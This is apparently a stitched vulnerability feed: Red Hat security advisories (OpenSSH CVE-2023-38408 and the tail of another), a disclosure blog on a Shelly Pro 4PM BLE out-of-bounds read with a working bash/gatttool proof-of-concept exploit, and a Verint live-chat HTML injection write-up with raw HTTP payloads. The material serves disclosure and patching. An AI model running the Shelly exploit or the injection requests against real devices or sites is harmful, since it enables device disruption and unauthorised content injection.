cjose-0.6.1-3.module+el8.8.0+19464+578f4546.s390x.rpm  
cjose-debuginfo-0.6.1-3.module+el8.8.0+19464+578f4546.s390x.rpm  
cjose-debugsource-0.6.1-3.module+el8.8.0+19464+578f4546.s390x.rpm  
cjose-devel-0.6.1-3.module+el8.8.0+19464+578f4546.s390x.rpm  
mod_auth_openidc-2.4.9.4-1.module+el8.7.0+14797+4085fcb6.s390x.rpm  
mod_auth_openidc-debuginfo-2.4.9.4-1.module+el8.7.0+14797+4085fcb6.s390x.rpm  
mod_auth_openidc-debugsource-2.4.9.4-1.module+el8.7.0+14797+4085fcb6.s390x.rpm

x86_64:  
cjose-0.6.1-3.module+el8.8.0+19464+578f4546.x86_64.rpm  
cjose-debuginfo-0.6.1-3.module+el8.8.0+19464+578f4546.x86_64.rpm  
cjose-debugsource-0.6.1-3.module+el8.8.0+19464+578f4546.x86_64.rpm  
cjose-devel-0.6.1-3.module+el8.8.0+19464+578f4546.x86_64.rpm  
mod_auth_openidc-2.4.9.4-1.module+el8.7.0+14797+4085fcb6.x86_64.rpm  
mod_auth_openidc-debuginfo-2.4.9.4-1.module+el8.7.0+14797+4085fcb6.x86_64.rpm  
mod_auth_openidc-debugsource-2.4.9.4-1.module+el8.7.0+14797+4085fcb6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-37464  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkyWkwAAoJENzjgjWX9erEG24P/i+4TGoaO9/hR9wuLOQEUGxP  
cwxJofQaM87VUncxKT2O4rP/B7o4tv+4gsJOW34G7J82dnQVMuz9SVAmpBqaw1+O  
39SFrZ0jAOQpYcI1cmCVtbiDYoCMbx19kP+F6r1GpuNxUyz7oKrMEX6K4SdqqoJE  
u9oxANvC33k+e5ALODi/KH6SP1I4hKN8B5L3Xq4yATZ/SOK9QPdruyNaKaieg41a  
w/fbsoMhrt8kqmxG8BTvJGeEAnc/gJfh9AM06txHazZtzBW7RV0hYZ2kw8pDGLX/  
g7KgfhAA+Y2DA7Fsm8PpwU0xe3Majz53K+A0unueehKkXdi8DLj7VpfgTIpfNIa0  
VOrfgifi5Wt0L6AvTmTmu4n5QrBAlI8Umlp3SJsopzIstENHvXUHIfQ50301NjjQ  
hVfZqaxwjsSjgjymcZMdgTAksmLwkOyvhneywDmnSF78De1Me6hmO+9AkwZrLmZ3  
1LrCs82bVNN9j7sWH1IH5aZJ/J2maF0CehhQWoKkBee9tVkoneKvZVCtDhXwUFoG  
hdOUB5ZZpt5J32duTAWEaMef3hKOSwEZuNDPgsdMk4ALzUeH5TvwThG+xTk791Z5  
ZG4IgCpXLUxT6wT4/sVGbiGkqglVcmWctPGE7hF2JVTK+MrSe/jtzfycSWVP79SP  
CbaBGzn82OfJL2Ov92WM  
=Rsez  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4418-01

Red Hat Security Advisory 2023-4419-01 - OpenSSH is an SSH protocol implementation supported by a number of Linux, UNIX, and similar operating systems. It includes the core files necessary for both the OpenSSH client and server. Issues addressed include a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: openssh security update  
Advisory ID:       RHSA-2023:4419-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4419  
Issue date:        2023-08-01  
CVE Names:         CVE-2023-38408   
=====================================================================

1. Summary:

An update for openssh is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

OpenSSH is an SSH protocol implementation supported by a number of Linux,  
UNIX, and similar operating systems. It includes the core files necessary  
for both the OpenSSH client and server.

Security Fix(es):

* openssh: Remote code execution in ssh-agent PKCS#11 support  
(CVE-2023-38408)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing this update, the OpenSSH server daemon (sshd) will be  
restarted automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2224173 - CVE-2023-38408 openssh: Remote code execution in ssh-agent PKCS#11 support

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

aarch64:  
openssh-askpass-8.0p1-19.el8_8.aarch64.rpm  
openssh-askpass-debuginfo-8.0p1-19.el8_8.aarch64.rpm  
openssh-cavs-debuginfo-8.0p1-19.el8_8.aarch64.rpm  
openssh-clients-debuginfo-8.0p1-19.el8_8.aarch64.rpm  
openssh-debuginfo-8.0p1-19.el8_8.aarch64.rpm  
openssh-debugsource-8.0p1-19.el8_8.aarch64.rpm  
openssh-keycat-debuginfo-8.0p1-19.el8_8.aarch64.rpm  
openssh-ldap-debuginfo-8.0p1-19.el8_8.aarch64.rpm  
openssh-server-debuginfo-8.0p1-19.el8_8.aarch64.rpm  
pam_ssh_agent_auth-debuginfo-0.10.3-7.19.el8_8.aarch64.rpm

ppc64le:  
openssh-askpass-8.0p1-19.el8_8.ppc64le.rpm  
openssh-askpass-debuginfo-8.0p1-19.el8_8.ppc64le.rpm  
openssh-cavs-debuginfo-8.0p1-19.el8_8.ppc64le.rpm  
openssh-clients-debuginfo-8.0p1-19.el8_8.ppc64le.rpm  
openssh-debuginfo-8.0p1-19.el8_8.ppc64le.rpm  
openssh-debugsource-8.0p1-19.el8_8.ppc64le.rpm  
openssh-keycat-debuginfo-8.0p1-19.el8_8.ppc64le.rpm  
openssh-ldap-debuginfo-8.0p1-19.el8_8.ppc64le.rpm  
openssh-server-debuginfo-8.0p1-19.el8_8.ppc64le.rpm  
pam_ssh_agent_auth-debuginfo-0.10.3-7.19.el8_8.ppc64le.rpm

s390x:  
openssh-askpass-8.0p1-19.el8_8.s390x.rpm  
openssh-askpass-debuginfo-8.0p1-19.el8_8.s390x.rpm  
openssh-cavs-debuginfo-8.0p1-19.el8_8.s390x.rpm  
openssh-clients-debuginfo-8.0p1-19.el8_8.s390x.rpm  
openssh-debuginfo-8.0p1-19.el8_8.s390x.rpm  
openssh-debugsource-8.0p1-19.el8_8.s390x.rpm  
openssh-keycat-debuginfo-8.0p1-19.el8_8.s390x.rpm  
openssh-ldap-debuginfo-8.0p1-19.el8_8.s390x.rpm  
openssh-server-debuginfo-8.0p1-19.el8_8.s390x.rpm  
pam_ssh_agent_auth-debuginfo-0.10.3-7.19.el8_8.s390x.rpm

x86_64:  
openssh-askpass-8.0p1-19.el8_8.x86_64.rpm  
openssh-askpass-debuginfo-8.0p1-19.el8_8.x86_64.rpm  
openssh-cavs-debuginfo-8.0p1-19.el8_8.x86_64.rpm  
openssh-clients-debuginfo-8.0p1-19.el8_8.x86_64.rpm  
openssh-debuginfo-8.0p1-19.el8_8.x86_64.rpm  
openssh-debugsource-8.0p1-19.el8_8.x86_64.rpm  
openssh-keycat-debuginfo-8.0p1-19.el8_8.x86_64.rpm  
openssh-ldap-debuginfo-8.0p1-19.el8_8.x86_64.rpm  
openssh-server-debuginfo-8.0p1-19.el8_8.x86_64.rpm  
pam_ssh_agent_auth-debuginfo-0.10.3-7.19.el8_8.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
openssh-8.0p1-19.el8_8.src.rpm

aarch64:  
openssh-8.0p1-19.el8_8.aarch64.rpm  
openssh-askpass-debuginfo-8.0p1-19.el8_8.aarch64.rpm  
openssh-cavs-8.0p1-19.el8_8.aarch64.rpm  
openssh-cavs-debuginfo-8.0p1-19.el8_8.aarch64.rpm  
openssh-clients-8.0p1-19.el8_8.aarch64.rpm  
openssh-clients-debuginfo-8.0p1-19.el8_8.aarch64.rpm  
openssh-debuginfo-8.0p1-19.el8_8.aarch64.rpm  
openssh-debugsource-8.0p1-19.el8_8.aarch64.rpm  
openssh-keycat-8.0p1-19.el8_8.aarch64.rpm  
openssh-keycat-debuginfo-8.0p1-19.el8_8.aarch64.rpm  
openssh-ldap-8.0p1-19.el8_8.aarch64.rpm  
openssh-ldap-debuginfo-8.0p1-19.el8_8.aarch64.rpm  
openssh-server-8.0p1-19.el8_8.aarch64.rpm  
openssh-server-debuginfo-8.0p1-19.el8_8.aarch64.rpm  
pam_ssh_agent_auth-0.10.3-7.19.el8_8.aarch64.rpm  
pam_ssh_agent_auth-debuginfo-0.10.3-7.19.el8_8.aarch64.rpm

ppc64le:  
openssh-8.0p1-19.el8_8.ppc64le.rpm  
openssh-askpass-debuginfo-8.0p1-19.el8_8.ppc64le.rpm  
openssh-cavs-8.0p1-19.el8_8.ppc64le.rpm  
openssh-cavs-debuginfo-8.0p1-19.el8_8.ppc64le.rpm  
openssh-clients-8.0p1-19.el8_8.ppc64le.rpm  
openssh-clients-debuginfo-8.0p1-19.el8_8.ppc64le.rpm  
openssh-debuginfo-8.0p1-19.el8_8.ppc64le.rpm  
openssh-debugsource-8.0p1-19.el8_8.ppc64le.rpm  
openssh-keycat-8.0p1-19.el8_8.ppc64le.rpm  
openssh-keycat-debuginfo-8.0p1-19.el8_8.ppc64le.rpm  
openssh-ldap-8.0p1-19.el8_8.ppc64le.rpm  
openssh-ldap-debuginfo-8.0p1-19.el8_8.ppc64le.rpm  
openssh-server-8.0p1-19.el8_8.ppc64le.rpm  
openssh-server-debuginfo-8.0p1-19.el8_8.ppc64le.rpm  
pam_ssh_agent_auth-0.10.3-7.19.el8_8.ppc64le.rpm  
pam_ssh_agent_auth-debuginfo-0.10.3-7.19.el8_8.ppc64le.rpm

s390x:  
openssh-8.0p1-19.el8_8.s390x.rpm  
openssh-askpass-debuginfo-8.0p1-19.el8_8.s390x.rpm  
openssh-cavs-8.0p1-19.el8_8.s390x.rpm  
openssh-cavs-debuginfo-8.0p1-19.el8_8.s390x.rpm  
openssh-clients-8.0p1-19.el8_8.s390x.rpm  
openssh-clients-debuginfo-8.0p1-19.el8_8.s390x.rpm  
openssh-debuginfo-8.0p1-19.el8_8.s390x.rpm  
openssh-debugsource-8.0p1-19.el8_8.s390x.rpm  
openssh-keycat-8.0p1-19.el8_8.s390x.rpm  
openssh-keycat-debuginfo-8.0p1-19.el8_8.s390x.rpm  
openssh-ldap-8.0p1-19.el8_8.s390x.rpm  
openssh-ldap-debuginfo-8.0p1-19.el8_8.s390x.rpm  
openssh-server-8.0p1-19.el8_8.s390x.rpm  
openssh-server-debuginfo-8.0p1-19.el8_8.s390x.rpm  
pam_ssh_agent_auth-0.10.3-7.19.el8_8.s390x.rpm  
pam_ssh_agent_auth-debuginfo-0.10.3-7.19.el8_8.s390x.rpm

x86_64:  
openssh-8.0p1-19.el8_8.x86_64.rpm  
openssh-askpass-debuginfo-8.0p1-19.el8_8.x86_64.rpm  
openssh-cavs-8.0p1-19.el8_8.x86_64.rpm  
openssh-cavs-debuginfo-8.0p1-19.el8_8.x86_64.rpm  
openssh-clients-8.0p1-19.el8_8.x86_64.rpm  
openssh-clients-debuginfo-8.0p1-19.el8_8.x86_64.rpm  
openssh-debuginfo-8.0p1-19.el8_8.x86_64.rpm  
openssh-debugsource-8.0p1-19.el8_8.x86_64.rpm  
openssh-keycat-8.0p1-19.el8_8.x86_64.rpm  
openssh-keycat-debuginfo-8.0p1-19.el8_8.x86_64.rpm  
openssh-ldap-8.0p1-19.el8_8.x86_64.rpm  
openssh-ldap-debuginfo-8.0p1-19.el8_8.x86_64.rpm  
openssh-server-8.0p1-19.el8_8.x86_64.rpm  
openssh-server-debuginfo-8.0p1-19.el8_8.x86_64.rpm  
pam_ssh_agent_auth-0.10.3-7.19.el8_8.x86_64.rpm  
pam_ssh_agent_auth-debuginfo-0.10.3-7.19.el8_8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-38408  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkyWkPAAoJENzjgjWX9erEPAQP/1kvj5+rlNhohPVSNmMf86PN  
9Sirpa8NRl0ecZboj29zVq7FCklUvebj6uCeWdv4X+YjoUj6zSDsN7sLMHx3nz7f  
x8zRUMC8Unju9lNC1/EinkU5d32jLpqF9JKvB+qsD1f6gG7TCPjBYAODfj+CRQ0D  
mtBPxTcYUp+qUe7CQrdwZsIaEenkQ7FIUl6XT1gvO2oR7Cp4NdyDFPlcECWK3Y0e  
IdJDaq/dQ6zRJVzmvEVJK717vaSB+fOCBcrEsI5MHXvvYR0e02yEbhEi6a84bV9G  
vK7J+u82VCUgUqBUbJJQsztxqkO6yebu+0O8Qo5EdqmOmLoUMv+1u79rgFQ2O+Ld  
eoVvo6jaLyAAi4IgZPsERlRK9AtVhgE8dZDnisJsDskGkuBpNACBqaDpOuP9fi2o  
/da2IHAFog3A5YIUMGXZyr0m8+SWxXroEFJwzmtrdgUNLaQXGgUbKaWi8aCE259j  
BZStxbTL8gOrVoYj7QXKOiIz5V0UbOq2Su++y8uQDA9uSGEe2Fz9FwiUOOv69ubv  
SWtCpFZInqbHJHWs4Zd78q+NI3JKTgMO596X/KoPZW7mJBB7bDoZQK/3VQlhysuL  
Htk2WKAsMU0iciXltts9GGpGCqsJ+/Jeooidoa1lnLTtl5q5y3axn7e1ZErQm4SL  
DDESp4Fh/sswQTI/NpgE  
=oTvc  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4419-01

OXID eShop Enterprise Edition 6.5.0 – 6.5.2 before 6.5.3 allows uploading files with modified headers in the administration area. An attacker can upload a file with a modified header to create a HTTP Response Splitting attack.

CVE-2023-38330: Security-Bulletins — OXID eSales Dokumentation

Shelly 4PM Pro four-channel smart switch 0.11.0 allows an attacker to trigger a BLE out of bounds read fault condition that results in a device reload.

**Authentication Bypass via an out-of-bounds read vulnerability**

**Introduction**

The Security Team at \[exploitsecurity.io\] uncovered a vulnerability in the Shelly 4PM Pro four-channel smart switch \[ Firmware Version 0.11.0\]. Under certain conditions the vulnerability allows an attacker to trigger an BLE out of bounds read fault condition that results in a device reload. It was found that this vulnerability could enable an attacker to switch on relays, if coupled with the systems scripting feature.

This blog looks to describe:

*   Affected Product Overview
    
*   The Shelly 4PM PRO under the hood
    
*   Attack Surface Mapping
    
*   Threat Modeling
    
*   Vulnerability Description
    
*   Responsible Disclosure
    
*   Proof of concept
    
*   Timeline
    

**Affected Product Overview**

The Shelly Pro 4PM is a DIN rail mountable four-channel smart switch with power measurement capabilities. Enhanced with all the gen2 firmware flexibility, LAN connectivity and color graphic display, it provides professional integrators with many more options for end customer solutions. It can work standalone in a local Wi-Fi network or it can also be operated through cloud home automation services. Shelly Pro 4PM can be accessed, controlled and monitored remotely from any place where the User has internet connectivity, as long as the device is connected to a Wi-Fi router and the Internet. Shelly Pro 4PM has an embedded Web Interface which can be used to monitor and control the device, as well as adjust its settings.

Product: Shelly PRO 4PM (GEN2)

Affected Firmware Version: 0.11.0

**Under the hood**

Under the hood the Shelly PRO 4PM runs on an ESP32-D0WDQ6 MCU. The device utilizes diverse technologies to help either control or communicate signals/traffic flows between the device and its respective management device. Under normal operating procedure the device uses RPC calls over HTTP in order to monitor and control the device through its associated mobile application. The device utilizes the RPC protocol for control and notifications. RPC messages can be sent using HTTP. In the event that authentication is enabled there is a requirement to include a nonce, cnounce and hashed response by the device being controlled. The hashed response is constructed using information from an initial RPC call that elicits a HTTP 401 response. This response contains randomized data that is used to instantiate the hashed response in a subsequent request. For more information relating to the RPC functionality visit - https://shelly-api-docs.shelly.cloud/gen2/General/Authentication

**Attack Surface Mapping**

The following attack surface map was determined:

Attack Surface Map

As can be seen the device is integrated into its environment using multiple distinct protocols including ModBus, HTTP, MQTT, RPC, WebSocket and UDP. All of which require access to either a physically connected ethernet or alternatively over RF/WiFi in order to interoperate.

As stated within the Product Overview \[above\], the device can be controlled either locally (within the host network) or alternatively remotely over the internet. The device is managed through the use of the associated Shelly Mobile Application. This application fulfills the function of monitoring of the device as well as control.

**Threat Modeling**

The predominate interaction with the device occurs using authenticated HTTP RPC calls. RPC is used to make the appropriate call for a specific function.

Using the above Attack Surface Mapping as a reference point, the Security Team at \[exploitsecurity.io\] considered multiple use cases in order to tease out weaknesses within the product. The following describes the hypothesis for each individual use case and the ultimate result in each case.

**WIFI and Physical Ethernet Vectors**

*   **Authentication bypass by capture replay (Authentication Enabled)** **_Use Case:_**
    

Although the Security Team noted that it was possible to replay unauthenticated control flows, the Security Team wanted to examine the possibility of capturing authenticated control packets and subsequently replaying these packets to gain control of the device.

**_Result:_**

These efforts were essentially thwarted through adequate randomized hashing mechanisms which included nonce, cnonce values and SHA256 encryption.

*   **Brute Forcing the authentication mechanism**
    

**_Use Case:_**

The Security Team found that it was possible to reverse the hashing algorthim. This algorithm incorporates the values username, password, realm, nonce, cnounce and a nc value. These values are then concatenated using ':' as a delimiter. A SHA256 hashing algorithm is then used to produce the resultant hash.

**_Result:_**

It was determined that due to the per request randomized values used to construct a correct hash that brute forcing was improbable.

**BLE Vector**

The Security Team turned their attention to the investigation of the BLE stack on the device. As far as could be determined the BLE functionality was currently ONLY used for device inclusion (Scanning/Importing of the device into the mobile application). Shelly devices are used as Bluetooth proxies to obtain data from devices which send data advertisements (notifications that do not require an active connection).

*   **Affecting the BT Stack to elicit an unknown system state**
    

**_Use Case:_**

Due to the use of an underlying ESP32 BT SoC, which are regularly found to harbor a known BLE vulnerability (https://asset-group.github.io/disclosures/braktooth/), it was posited that it may be possible to affect an unknown system state using this type of attack vector.

Prying further into how BLE may be used on earlier Shelly devices, it was uncovered that it may have been used to service formatted JSON RPC calls.

An overview of the RPC via BLE process is detailed below:

*   Under normal circumstances the device expects RPC JSON data (RPC calls use JSON format) to be written to BLE characteristic handle 0x0008.
    
*   The RPC calls noted here are the same as the ones previously mentioned above in this blog post.
    
*   In order to make ready the BLE stack to accept this data there is a requirement for the length of the required RPC JSON data to be written to BLE write handle 0x000d.
    
*   The data written at this location informs the characteristic read/write handle 0x0008 that it should expect 'x' amount of byte(s).
    
*   These bytes correspond to the length of the RPC JSON data.
    

**_Result:_**

Understanding the above RPC via BLE process the Security Team looked at possible ways to trigger the posited out-of-bounds read vulnerability.

The Security Team found that in order to produce a consistent fault condition, that it was possible to set an arbitrary length, through a write to BLE handle 0x000d followed by a subsequent write to read/write handle 0x0008.

The subsequent write to handle 0x0008, using a larger length of input data than was expected, would ultimately result in a device reset condition.

**Additional Feature**

As an additional feature the Shelly PRO 4PM allows for a scripting feature to be manually configured. This feature allows for automated tasks to be triggered upon certain events.

Example of such events may include

*   Toggling of relays
    
*   Monitoring of the status of the devices' cover.
    

**Chained Attack**

The Security Team found that by chaining the BLE fault condition together with the Shelly PRO scripting feature, that it was possible to coerce the device into execution of the pre-configured script which would ultimately result in the toggling of the on-board relay.

This behavior was noted as affecting the device configured with or without authentication enabled.

**Responsible Disclosure**

The Security Team at \[exploitsecurity.io\], reached out to the vendor to ensure that a patch was released prior to public disclosure. However, as of the time of this disclosure, no patch has been applied.

**Proof of Concept**

The proof of concept code wraps the GATTTOOL utility into a functional exploit.

#!/bin/bash

IFS\=
failed\=$false
RED\="\\e\[31m"
GREEN\="\\e\[92m"
WHITE\="\\e\[97m"
ENDCOLOR\="\\e\[0m"
substring\="Connection refused"

banner()
    {
        clear
        echo \-e "${GREEN}\[+\]\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\[+\]"
        echo \-e "${GREEN}|   Author : Security Team \[${RED}exploitsecurity.io${ENDCOLOR}\]              |"
        echo \-e "${GREEN}|   Description: Shelly PRO 4PM - Out of Bounds              |"
        echo \-e "${GREEN}|   CVE: CVE-2023-33383                                      |"
        echo \-e "${GREEN}\[+\]\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\[+\]"
        echo \-e "${GREEN}\[Enter key to send payload\]${ENDCOLOR}"
    }

banner
read \-s \-n 1 key
if \[ "$key" \= "x" \]; then
    exit 0;
elif \[ "$key" \= "" \]; then
    gattout\=$(sudo timeout 5 gatttool \-b c8:f0:9e:88:92:3e \--primary)
    if \[ \-z "$gattout" \]; then
        echo \-e "${RED}Connection timed out${ENDCOLOR}"
        exit 0;
    else
    sudo gatttool \-b c8:f0:9e:88:92:3e \--char\-write\-req \-a 0x000d \-n 00000001 \>/dev/null 2\>&1
    echo \-ne "${GREEN}\[Sending Payload\]${ENDCOLOR}"
    sleep 1
    if \[ $? \-eq 1 \]; then
       $failed\=$true
       exit 0;
    fi
    sudo gatttool \-b c8:f0:9e:88:92:3e \--char\-write\-req \-a 0x0008 \-n ab \>/dev/null 2\>&1
    sleep 1
    if \[ $? \-eq 1 \]; then
        $failed\=$true
        echo \-e "${RED}\[\*\*Exploit Failed\*\*\]${ENDCOLOR}"
        exit 0;
    else
       sudo gatttool \-b c8:f0:9e:88:92:3e \--char\-write\-req \-a 0x0008 \-n abcd \>/dev/null 2\>&1
       sleep 1
       for i in {1..5}
       do
          echo \-ne "${GREEN}."
          sleep 1
       done
       echo \-e "\\n${WHITE}\[Pwned!\]${ENDCOLOR}"
    fi
fi
fi

**Timeline**

1.  1st May 2023 - Reached out to vendor via https://support.shelly.cloud/en/support/tickets/new?ticket\_form=report\_an\_issue for initial report disclosure. Created a support ticket (https://support.shelly.cloud/en/support/tickets/36432).
    
2.  3rd May 2023 - Support Ticket removed from shelly support site
    
3.  3rd May 2023 - Reached out to support@shelly.cloud
    
4.  4th May 2023 - Received communications from support@shelly.cloud. Sent through proof of concept steps.
    
5.  9th May 2023 - Received email confirmation from support@shelly.cloud advising that weakness is being further examined by shelly developers
    
6.  9th May 2023 - Registered for CVE-2023-33383
    
7.  9th June 2023 - Received confirmation from vendor of issue replication
    
8.  29th May 2023 - CVE reference: CVE-2023-33383 assigned (MITRE)
    
9.  2nd August 2023 - Public Disclosure Published
    

_Please see Shelly change log for updates_ https://shelly-api-docs.shelly.cloud/gen2/changelog/

CVE-2023-33383: CVE-2023-33383

Verint Engagement Management 15.3 Update 2023R2 is vulnerable to HTML injection via the user data form in the live chat.

Verint live-chat is an application part of Verint Engagement Management (version 15.3 Update 2023R2) that makes it possible for users on a website to ask questions through a chat box. The questions are answered by an employee via the Verint dashboard.  
It is possible to inject HTML code into the "User Data" form in the live-chat.

When we create a new chat an API call is made. In this JSON API call, it is possible to inject HTML code into the following parameters: "customerFirstName", "customerEmail", "customerLocale" and "refererURL".

    POST /chat/CONAV/chat/rest/api/clients?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517 HTTP/1.1
    Host: apps.x.nl
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: application/json, text/plain, */*
    Accept-Language: nl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: https://staging.x.nl/
    Content-Type: application/json
    Content-Length: 234
    Origin: https://staging.x.nl
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-site
    Te: trailers
    Connection: close
    
    {"customerFirstName":"<h1>AAAAAAAAAAAAAAAAAAAAAAAAA</h1>",
    "customerEmail":"<h1>ee@recoil.nl</h1>",
    "customerLocale":"<h1>nl</h1>",
    "chatLaunchMode":"CHAT_ONLY",
    "refererURL":"<h1>https://recoil.nl<h1>",
    "launchCode":"KanaChat",
    "launchIdentifier":"KanaChat"}
    

Take note of the "userId" in the response, we can use this to spawn a chat with the employee.

    HTTP/1.1 201 Created
    connection: close
    content-type: application/hal+json
    date: Mon, 08 May 2023 14:44:58 GMT
    p3p: CP="NON CUR OTPi OUR NOR UNI"
    access-control-allow-origin: *
    access-control-allow-methods: PUT, GET, POST, OPTIONS
    access-control-allow-headers: origin, x-requested-with, content-type
    x-frame-options: SAMEORIGIN
    x-content-type-options: nosniff
    x-xss-protection: 0
    strict-transport-security: max-age=31536000; includeSubDomains
    Set-Cookie: JSESSIONID=Tsf70qRg5layXAoUlwgHYIrAC_3VFCKXjXtfiH1xE-KBpWrqsYyK!896618273; Path=/chat/; Secure; HttpOnly
    
    {"userName":"AAAAAAAAAAAAAAAAAAAAAAAAA",
    "userLoginId":"9678-648618303ce0f6327e41ba6a332e392376e615eb048a",
    "userId":"vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am","_links":{"self":{"href":"/CONAV/chat/rest/api/clients?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"event":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"queuedstatus":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/queuedstatus?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"logout":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/logout?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"}}}
    

With the following request we can spawn a chat box.

    POST /chat/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517 HTTP/1.1
    Host: apps.x.nl
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: application/json, text/plain, */*
    Accept-Language: nl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: https://staging.x.nl/
    Content-Type: application/json
    Content-Length: 41
    Origin: https://staging.x.nl
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-site
    Te: trailers
    Connection: close
    
    [
    	{
    		"type":"MessageSent",
    		"text":"123test"
    	}
    ]
    

Response:

    HTTP/1.1 200 OK
    connection: close
    content-type: application/hal+json
    date: Mon, 08 May 2023 14:45:07 GMT
    p3p: CP="NON CUR OTPi OUR NOR UNI"
    access-control-allow-origin: *
    access-control-allow-methods: PUT, GET, POST, OPTIONS
    access-control-allow-headers: origin, x-requested-with, content-type
    x-frame-options: SAMEORIGIN
    x-content-type-options: nosniff
    x-xss-protection: 0
    strict-transport-security: max-age=31536000; includeSubDomains
    
    {"events":[],"_links":{"self":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"nextevent":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"logout":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/logout?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"}}}
    

By now the employee should get a notification of a new incoming message. When the chat opens the HTML injection takes place. As seen in the red square in the screenshot below.

When we inspect the source of the webpage we see that it has interpret the HTML code into the website as shown in the screenshot below.

CVE-2023-33257: Verint Live-chat HTML injection

Data Illusion Survey Software Solutions ngSurvey version 2.4.28 and below is vulnerable to Denial of Service if a survey contains a "Text Field", "Comment Field" or "Contact Details".

**CVE-2022-46485****ngDoS - ngSurvey <= 2.4.28 Denial of Service**

